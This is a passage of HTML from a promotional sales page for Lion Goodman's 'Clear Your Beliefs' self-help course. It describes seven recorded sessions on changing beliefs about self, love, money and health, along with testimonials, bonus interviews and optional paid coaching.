way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships. If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?\r\n\r\nHumans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\r\n\r\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-portrait-2.jpg"><img class="alignleft  wp-image-1029" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-portrait-2-250x300.jpg" alt="Carista portrait 2" width="160" height="192" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">Optional: Professional Coaching Sessions</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>You can easily take this journey on your own, one recorded session at a time.  You also have the option of adding personalized support from a <em>Clear Your Beliefs Coach</em> – a qualified professional who will accompany you on your journey and guide you, step-by-step, through the process.\r\n\r\nOur outstanding coaches are trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\r\n\r\n<em>Clear Your Beliefs Coaches</em> are located throughout the United States and Canada, and worldwide, from Europe to Australia, and South Africa to Scandinavia. Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\r\n\r\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\r\n\r\nTake advantage of this up-close-and-personal support during the program.  Support sessions are optional, and are provided at an additional cost.  <strong>Choose the plan that suits you best - from the recorded program-only, to full support each week.</strong>\r\n\r\n&nbsp;\r\n<div class="icon_box" style="width: 760px; margin: 17px 0 17px -70px;">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home.  Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\r\n<h1>Plus: <em>The Entire 